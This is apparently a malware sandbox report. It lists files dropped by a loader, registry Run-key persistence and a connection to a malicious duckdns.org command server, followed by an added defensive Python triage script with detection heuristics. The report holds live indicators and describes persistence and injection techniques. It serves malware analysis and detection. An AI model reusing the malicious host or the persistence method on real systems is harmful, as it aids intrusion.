C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3X8NFKWBGMH5F213ROJI.temp
––
MD5:  ––
SHA256:  ––
3440
iexplore.exe
C:\Users\admin\AppData\Local\Temp\JavaDeployReg.log
text
MD5: 7a0b0f2e37cdcf3372d66ce551268c90
SHA256: 30b9eaa1128dde03611ce8afc723d0eabd92e7331f59dc9e3175f20595c94f64
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{D6448702-150F-11E9-AA93-5254004A04AF}.dat
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DF6422D1DA8995D7FE.TMP
––
MD5:  ––
SHA256:  ––
3768
lwh.exe
C:\Users\admin\AppData\Local\Temp\88465914\VTOCI
text
MD5: a2a05c7c5c6e1f0e321ff04d189c807b
SHA256: 8f4cb5c38052838d008e31a32b73489920b31765fe77d0e856d632396aa55c08
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sut.bmp
text
MD5: 12d2ff5f2bd1226155cf398b2611f24c
SHA256: 5dbe01f939754dddc3bdb93f6973e6abc5f9f77d3db23ae408a2eba0bc91f0bc
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\tad.ico
text
MD5: 103b96bcb66f2209287408a5cbf39c54
SHA256: 91d3daa3d9736f8162035c883f2f03566f9fae655fffb758dfe1ace25d3c43fc
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\gcf.txt
text
MD5: b33c8f0b801470de2fabd49e5b3199cb
SHA256: e29f4464e89acd12cdeca9f02a383df2cddc9de841ab11ef749b56a7c78a95e6
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cxq.icm
text
MD5: 23605c61108c31c4842542688d923607
SHA256: 0f3f8bbc33c4670c44f4aa278399390b974032707feb28d0ea6036bf5053cef3
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dum.dat
text
MD5: d431ffef88fddf1d223cdedde385422c
SHA256: 066d8823d1d986cbcfab41c84909b5f3ff1911dc9b7e558ba08efabbf3d7ab30
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\pgk.mp3
text
MD5: e6280f412c6b8205fdc11bc1b40c7227
SHA256: b9937317673bb29304856556083e8147efa0ab3ef4d18bc9c185542098c7b8a3
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dtb.mp4
text
MD5: 186821a6a76a497ba83f77c2eb694ddf
SHA256: 7057045ecfa6d5b5c645d174489883fb4baac3a51690378bc9fcf8f305e78d41
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hwf.jpg
text
MD5: 1fc66383e0f54920395adf32b8f09dd2
SHA256: ae09367185471cbab68f65dbbd944b66d5591f7bc6b95b7684b99285c36dd245
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\toi.ppt
text
MD5: 5bc1af579a99121ac35ab6e3ff7d470b
SHA256: 1b2006d22c8b4b264339acc62b103785d73c735097a3147308067575c4367735
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cao.mp3
text
MD5: 043f82458c6773f731b5696043c362da
SHA256: d59b678abd525d18297b899f27899119dc99464b15fe49f7fe56cd69ae7d6e70
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mhp.mp4
text
MD5: 553707dc56652e93ccef5c41b70d98b0
SHA256: 56ea1dbace1467d0f3fae8649811d5c47b2dd837d9d28728147dea6ee0c0383b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\esj.bmp
text
MD5: 94069010e2039643feb6b1a176c32914
SHA256: cedce64510a5d8add40b2dedc4eedfbd8877427c5f136c0a2aff8ce84d417a3b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qtj.xl
text
MD5: eb0f3fe4ce0a1084a869d54355d09c4d
SHA256: c04037373979c876eae016a9bd101d603ab8bd53f605aa49cde4c83798de15c8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\brv.ppt
text
MD5: 02d041908329e615153fef40a54717ad
SHA256: ffa37afeddd510dc4731f20d0fbc9e4c16e0b4be08cef9d82b7e4ea4de339805
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hoo.dat
text
MD5: 8f6f9814ba2e29d967309bb8e0a6380b
SHA256: 653c24e9331224c5215108d031334a9cf1131027800ec2caaf15642082145f01
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\rdk.pdf
text
MD5: b4df41efd6c800138a77be1761152e50
SHA256: a0c9b59353c09784c8a22090a444eb50f6a426ab1c1fbdb4b14a66a16007b39f
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\rcq.ico
text
MD5: 4d1d18662f21e21ef459232deada43f7
SHA256: 86ec0cb5c36dd91acf45577a049c82776328615910cad59c01f72ae907449f22
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ldr.jpg
text
MD5: 421005e70abcbf87222d73d0d8c9ffbf
SHA256: 0d985b3ae47bceff4f774bc0498d21de91ad48436bebc42714a15d8428ca37f6
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\xnd.mp3
text
MD5: ce8320241e7e4d8ea08f632e0265a1f7
SHA256: c6cb40094e9771a469d59d5e30fbf5f537228551b5e9653ef1f056ccd7e24c96
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\lir.dat
text
MD5: 3a2ab15da2ae4b54778b55d0deb759c9
SHA256: 71994270ac757e6aa8ce7a03b9efbb0a7a7a4f0d71af80c9289cfcd1852654fd
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\nln.mp4
text
MD5: df9144baf063168d81b37fde1b5eb8c0
SHA256: c41f439b73af6a721e6f9cb8c16491854b0d47dfc1de8139a28060eac780a091
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ils.icm
text
MD5: cf7c98814107d76fd65a8b1fa5e257f0
SHA256: c2c97e396c58b8586cad19af4d5fb3db14bbefa6df0d244fecc4683678457441
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\tst.mp4
text
MD5: b9a2c5e94ace453ac8bab48dc1fea869
SHA256: d958797f5d75d5803e3eb689b370de289995395c5764ad0298ff51eb91ba30d8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hrm.pdf
text
MD5: a8dd35c6c36f2c208d46c2189fa49a3c
SHA256: 66b1fdf9f7e71129a938ba8c8fe5bb4490d51a99b004bab9b5bf462404045156
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sxr.txt
text
MD5: 72efb2da2feec77570c650a39589f28d
SHA256: cb1f1451cb7290c0391d1ff58578b7bfaf7213901789aeed3920703911fb4035
3440
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019011020190111\index.dat
dat
MD5: cba4d69dffafa00db6b321a46491d5ef
SHA256: ac378e39a16b3e8a1b83485d3563c690ef744d9c2b3428fd3d187bf15e561a97
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qnf.pdf
text
MD5: fcc35763c67bcb2cc84d936278af25b1
SHA256: 0d14529aab80078efb3e893fd28beea72be9d5f4608f6e35dd233be19a76265d
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\qrf.xl
text
MD5: e5703142fab8fbbcbf5cd39c9378b32d
SHA256: ab4ffda173db74183f0760d868d8d8accfb975c10067e2b8c45b8c0a272c727d
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\hpk.pdf
text
MD5: bf620765985336d62fb99f99ad8cd3ec
SHA256: b0863d4738f7e36575f9bd2b37d68663f61198d6545cfa6547f936f460cdd458
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fri.pdf
text
MD5: 5c350476642a993b84d53a6edf31b482
SHA256: d4dbfc1f4218fdeccd73cc16a29a7a7b3b6f098b2a5274496738eca3bbc14e6b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\coa.icm
text
MD5: d4a678eddee78c562ef20901cd8c7bbd
SHA256: 605dfa8f9f1dee525c73ca29d8ef30edea733fc8e8a135cd6128460ce28c429e
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\etl.mp3
text
MD5: 6c39e2343bd4bedb8810ae1ca1f6e9c0
SHA256: 7f3050a43efbd6d2e67c43e11002a3c99ce47e06f39a99bf645a1cc1667a0efa
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mtw.dat
text
MD5: 128157fad0851e016a9d8c75d03270a6
SHA256: c5f2a7e4e5dcd9f984c60fcc5d508202652c6e7a2d5b83c94041166fea6b6c14
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\bet.bmp
text
MD5: f7359b514d0a679665a288364b8b895a
SHA256: aa46e02d7052ae7af9843b20e2ded80af743b77624fb90aeb25481bdb608c2e4
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\oih.jpg
text
MD5: 263c44e198ae2328042ba3e3377a9cea
SHA256: 58e518fc888f0886748732308e17cf751e3e687c2c605bdd5f25084b61f29486
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\sip.dat
text
MD5: abae0d20c022f7da8fb7cba3b36154d5
SHA256: 92187287285f74f30b457f2a69936d9d120a9445d3f29509f3753652e32becee
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\jxn.txt
text
MD5: 11d8800a15ebdb99487edebc06ef86e8
SHA256: 7e63ef6f2a78b51ad2915d0ca50d0b0d0420600ba8f4a99ee6cdae3ac7868a99
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\kwp.xl
text
MD5: 60bce68219ac22682488f4b02405694e
SHA256: dd206de951223be9b409fe0884603b17b35ff409ae19253e4b12ec09c77934e1
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fjd.pdf
text
MD5: ea3e95e581795a8fad88e8f5bc6523bb
SHA256: fce44787111ed976da4eade1d9ff438d1854bc4b3a9a44c71936be4b8bcd53ca
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\olh.mp3
text
MD5: 7b4bc7c28ea0ffb5ba1b2668b5e49dcd
SHA256: 5d3cb61feffab53d0e3a8b651191ae33a309ff163e0d3a807f0b454fb5903bb8
3000
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms
binary
MD5: 1b4ee650b3123bd273d2e63bbf10ff2a
SHA256: 8d46217e909ad47f7d7c19f1c7c4b8d8d18c5249281e73d194c82215fe5ae2d8
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\cnk.txt
text
MD5: a6ea2d6bb0ac8834155d4091d4f81fec
SHA256: 7c7018ab6fc90a78f4be45d91dbca9d9b001e383e33866016d08f2b0f524a5b9
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mvk.xl
text
MD5: b94467aef46e19383eb48c5a2471afe3
SHA256: c4c434ae9d22a3249c53af8c683adebd148e658c08f433533a1f067b3219d556
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\emu.mp3
text
MD5: 5709f32a91fe4fd8db720bcabd3546d1
SHA256: c9992eb858b214114aef5f2bdfae725920e4550a4b8e77301144d9363e3f9760
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\mlk.mp4
text
MD5: 240a4e26582b6d589ff0e49c72e1007a
SHA256: 768bb11a1a76f4704fc35ea39e8f8926b998e1a2d1dadf87e7042ae29e3966e2
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\dwa.icm
text
MD5: 3a5452c2af12fb5f972f8ff46c91888c
SHA256: cb857b22e73625770e18ec4029da260e7f99f4738e847b16b5eaa56d294f687b
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\idn.docx
text
MD5: b0341df38a4783109002ab4cf33c9d55
SHA256: c2073ffebe269e494a467760438c9f2a34c109584965555e4a5ffe2febeb4858
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\fld=ktl
text
MD5: 2ab49ff2e034d5c9cd371aa68fb4b67b
SHA256: 04a711b91241c5d9b0513f02535b46c3cd9181ace04c6a673dde5da1486373df
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\ibw.mp4
text
MD5: 7cba224e33403861f74573f8464d3d2f
SHA256: ad912169922c0f25f333cf4235429b63c567e349080a4cb6c78f2f49f8279f7e
2632
WfFyPbj.exe
C:\Users\admin\AppData\Local\Temp\88465914\plv.mp4
text
MD5: 61f1aa2f3a4ec269b21904a9501f5f67
SHA256: dbadef1663555f8d0aa056a87cf9e7403926b26d44d45198982973e41836dd95
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{D6448701-150F-11E9-AA93-5254004A04AF}.dat
––
MD5:  ––
SHA256:  ––
3716
powershell.exe
C:\Users\admin\AppData\Roaming\WfFyPbj.jpg
image
MD5: 38c3261d8e98a3bbbcfaff8c259a9dde
SHA256: 98f6e62abc7a08ff41584696cf46da99c86c3eef95d1cf3bf6262054e71e4e74
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF21468e.TMP
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
binary
MD5: 2bcad5da21cb41b727abde7d6b6990b8
SHA256: ab1397e3a31059329829ae2164787589945b1459ed2e1b7328e86ed497a6f9f3
3716
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\84U14WF1C1GOHJU9ZFQS.temp
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[3].png
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
3000
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\favicon[1].ico
––
MD5:  ––
SHA256:  ––
3000
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms~RF2205b7.TMP
binary
MD5: 1b4ee650b3123bd273d2e63bbf10ff2a
SHA256: 8d46217e909ad47f7d7c19f1c7c4b8d8d18c5249281e73d194c82215fe5ae2d8

Network activity

HTTP(S) requests
1
TCP/UDP connections
15
DNS requests
8
Threats
4

HTTP requests

PID   Process       Method  HTTP Code  IP                URL                              CN  Type   Size  Reputation
3000  iexplore.exe  GET     200        13.107.21.200:80  http://www.bing.com/favicon.ico  US  image  ––    whitelisted

Connections

PID Process IP ASN CN Reputation
3000 iexplore.exe 13.107.21.200:80 Microsoft Corporation US whitelisted
3716 powershell.exe 52.219.32.73:443 Amazon.com, Inc. SG unknown
1144 RegSvcs.exe 45.249.90.124:1609 Korea Telecom KR malicious

DNS requests

Domain                           IP                              Reputation
www.bing.com                     13.107.21.200, 204.79.197.200   whitelisted
s3-ap-southeast-1.amazonaws.com  52.219.32.73                    shared
idea1com2002.duckdns.org         45.249.90.124                   malicious
dns.msftncsi.com                 131.107.255.255                 whitelisted

Threats

PID Process Class Message
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
–– –– Misc activity ET INFO DYNAMIC_DNS Query to *.duckdns. Domain
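Three records in this report carry the whole story and are the ones worth turning into detection logic: powershell.exe (PID 3716) and lwh.exe (PID 2736) both write HKCU\...\CurrentVersion\Run values pointing into the user profile (WfFyPbj.exe under AppData\Roaming, and lwh.exe under Temp with a second file from the same directory as its argument; FLD_KT~1 is consistent with the 8.3 short name of the dropped fld=ktl); RegSvcs.exe (PID 1144) is started by lwh.exe with an empty command line, yet it is the process that connects to 45.249.90.124:1609, and its module list includes avicap32.dll and msvfw32.dll, video-capture libraries a .NET installation utility has no reason to load; and the only DNS name behind that connection is a duckdns.org host. The script below is an added example written for this page, not part of the ANY.RUN report or its detection engine. Its input lists are hand-copied from the tables above (constructed sample data), and the user-writable-path pattern, the .NET-host watchlist and the dynamic-DNS suffix list are the editor's own heuristics, not anything the report states.

```python
"""Triage the registry, process and network records from the report above.

Added example; the record lists are constructed from the report tables and
the three rules are the editor's heuristics, not ANY.RUN's detection logic.
"""
import re
from collections import namedtuple

Finding = namedtuple("Finding", "rule process detail")

# --- records transcribed from the report (constructed sample input) ---------
REGISTRY_WRITES = [
    {"pid": 3716, "process": "powershell.exe", "op": "write",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "WfFyPbj", "value": r"C:\Users\admin\AppData\Roaming\WfFyPbj.exe"},
    {"pid": 2736, "process": "lwh.exe", "op": "write",
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "qwertyhfdsd.exe",
     "value": r"C:\Users\admin\AppData\Local\Temp\88465914\lwh.exe C:\Users\admin\AppData\Local\Temp\88465914\FLD_KT~1"},
    {"pid": 3716, "process": "powershell.exe", "op": "write",   # benign noise
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap",
     "name": "AutoDetect", "value": "1"},
]
PROCESSES = [
    {"pid": 1144, "parent": "lwh.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"'},
]
CONNECTIONS = [
    {"pid": 3000, "process": "iexplore.exe", "dst": "13.107.21.200:80"},
    {"pid": 3716, "process": "powershell.exe", "dst": "52.219.32.73:443"},
    {"pid": 1144, "process": "RegSvcs.exe", "dst": "45.249.90.124:1609"},
]
DNS_REQUESTS = {
    "www.bing.com": ["13.107.21.200", "204.79.197.200"],
    "s3-ap-southeast-1.amazonaws.com": ["52.219.32.73"],
    "idea1com2002.duckdns.org": ["45.249.90.124"],
    "dns.msftncsi.com": ["131.107.255.255"],
}

# --- editor's heuristics (assumptions, not taken from the report) ----------
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\|\\Temp\\", re.IGNORECASE)
AUTORUN_KEYS = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
# Signed .NET utilities shipped with every Framework install that are
# commonly used as hosts for injected code.
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
DYNAMIC_DNS = (".duckdns.org", ".no-ip.org", ".ddns.net")  # short watchlist


def split_command(cmdline):
    """Return (image, arguments) for a Windows command line, honouring quotes."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip()
    image, _, args = cmdline.partition(" ")
    return image, args.strip()


def autorun_from_user_paths(writes):
    """Run/RunOnce values whose target executable lives under the profile or Temp."""
    out = []
    for w in writes:
        if w["op"] != "write" or not AUTORUN_KEYS.search(w["key"]):
            continue
        image, _ = split_command(w["value"])
        if USER_WRITABLE.search(image):
            out.append(Finding("autorun_user_path", w["process"], image))
    return out


def dotnet_host_with_network(processes, connections):
    """A .NET utility started with no arguments that still owns a socket.

    RegSvcs.exe with an empty command line has nothing to register and exits;
    a long-lived instance that talks to the network is running code its
    parent put there."""
    talking = {c["pid"] for c in connections}
    out = []
    for p in processes:
        image, args = split_command(p["cmdline"])
        name = image.rsplit("\\", 1)[-1].lower()
        if name in DOTNET_HOSTS and not args and p["pid"] in talking:
            out.append(Finding("dotnet_host_injected", name, "parent=%s" % p["parent"]))
    return out


def dynamic_dns_connections(connections, dns):
    """Join connections to DNS answers by IP and flag dynamic-DNS destinations."""
    ip_to_domain = {ip: d for d, ips in dns.items() for ip in ips}
    out = []
    for c in connections:
        ip, _, port = c["dst"].rpartition(":")
        domain = ip_to_domain.get(ip, "")
        if domain.endswith(DYNAMIC_DNS):
            out.append(Finding("dynamic_dns_c2", c["process"], "%s %s:%s" % (domain, ip, port)))
    return out


def triage():
    """Run all three rules over the transcribed records, in report order."""
    return (autorun_from_user_paths(REGISTRY_WRITES)
            + dotnet_host_with_network(PROCESSES, CONNECTIONS)
            + dynamic_dns_connections(CONNECTIONS, DNS_REQUESTS))


if __name__ == "__main__":
    for f in triage():
        print("%-22s %-16s %s" % (f.rule, f.process, f.detail))
```

The join in dynamic_dns_connections is the step that matters when reading this kind of report: the Connections table only gives PID and IP, and the DNS table only gives name and IP, so attributing the duckdns.org name to RegSvcs.exe requires matching on the address. The autorun rule deliberately parses out the first token of the Run value before testing the path, so that a loader registered with arguments (as lwh.exe is here) is caught on its image path rather than on the whole command line.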

Debug output strings

No debug info.